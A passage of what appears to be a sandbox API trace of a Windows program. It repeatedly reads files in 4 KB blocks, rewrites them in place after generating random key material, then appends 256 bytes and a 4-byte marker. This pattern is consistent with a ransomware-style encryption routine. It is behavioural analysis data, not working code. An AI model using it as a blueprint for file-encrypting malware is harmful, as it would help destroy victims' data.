hFile=0x9f0, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.261] WriteFile (in: hFile=0x9f0, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.261] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.261] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.262] GetProcessHeap () returned 0x4f10000 [0086.262] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.263] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.263] GetProcessHeap () returned 0x4f10000 [0086.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.264] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.264] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0086.265] GetProcessHeap () returned 0x4f10000 [0086.265] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.266] GetProcessHeap () returned 0x4f10000 [0086.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0086.266] GetProcessHeap () returned 0x4f10000 [0086.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0086.266] GetProcessHeap () returned 0x4f10000 [0086.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0086.266] GetProcessHeap () returned 0x4f10000 [0086.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0086.266] SetFilePointerEx (in: hFile=0x9f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.266] WriteFile (in: hFile=0x9f0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0086.266] WriteFile (in: hFile=0x9f0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0086.266] GetProcessHeap () returned 0x4f10000 [0086.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0086.266] GetProcessHeap () returned 0x4f10000 [0086.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0086.266] GetProcessHeap () returned 0x4f10000 [0086.266] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0086.266] CloseHandle (hObject=0x9f0) returned 1 [0086.268] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 158 [0086.268] SetFilePointerEx (in: hFile=0x9f4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.268] ReadFile (in: hFile=0x9f4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0086.268] SetFilePointerEx (in: hFile=0x9f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.268] GetProcessHeap () returned 0x4f10000 [0086.268] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0086.268] GetProcessHeap () returned 0x4f10000 [0086.268] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0086.268] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0086.269] GetProcessHeap () returned 0x4f10000 [0086.269] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0086.269] ReadFile (in: hFile=0x9f4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0086.329] SetFilePointerEx (in: hFile=0x9f4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0086.329] WriteFile (in: hFile=0x9f4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0086.329] GetProcessHeap () returned 0x4f10000 [0086.329] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0086.329] GetProcessHeap () returned 0x4f10000 [0086.329] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.329] GetProcessHeap () returned 0x4f10000 [0086.329] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0086.329] GetProcessHeap () returned 0x4f10000 [0086.329] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.329] GetProcessHeap () returned 0x4f10000 [0086.329] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0086.329] GetProcessHeap () returned 0x4f10000 [0086.329] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0086.329] GetProcessHeap () returned 0x4f10000 [0086.329] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.330] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.330] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.331] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0086.331] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.332] GetProcessHeap () returned 0x4f10000 [0086.332] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0086.333] GetProcessHeap () returned 0x4f10000 [0086.333] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0086.333] GetProcessHeap 